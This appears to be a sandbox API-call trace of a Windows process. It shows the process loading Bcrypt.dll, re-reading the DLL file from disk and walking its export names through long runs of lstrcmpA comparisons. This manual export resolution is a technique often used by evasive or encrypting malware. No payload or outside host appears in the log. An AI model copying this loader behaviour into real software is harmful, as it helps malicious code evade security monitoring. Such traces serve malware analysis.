lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0145.670] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0145.704] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0145.704] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0145.705] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0145.834] GetProcessHeap () returned 0x470000 [0145.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150040 | out: hHeap=0x470000) returned 1 [0146.436] GetProcessHeap () returned 0x470000 [0146.436] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489bd0 [0146.437] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0146.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0146.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0146.443] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0146.443] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0146.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0146.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0146.443] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0146.444] GetProcessHeap () returned 0x470000 [0146.444] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x26fa0) returned 0x2d92010 [0146.445] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0146.445] ReadFile (in: hFile=0x15c, lpBuffer=0x2d92010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d92010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0146.448] CloseHandle (hObject=0x15c) returned 1 [0146.449] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0146.449] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0146.449] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0146.449] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0146.449] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0146.449] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0146.449] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0146.449] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.449] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.450] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0146.450] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0146.450] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0146.450] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0146.450] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0146.450] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0146.450] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0146.451] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0146.452] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0146.452] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0146.453] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0146.454] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0146.455] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0146.455] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0146.456] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 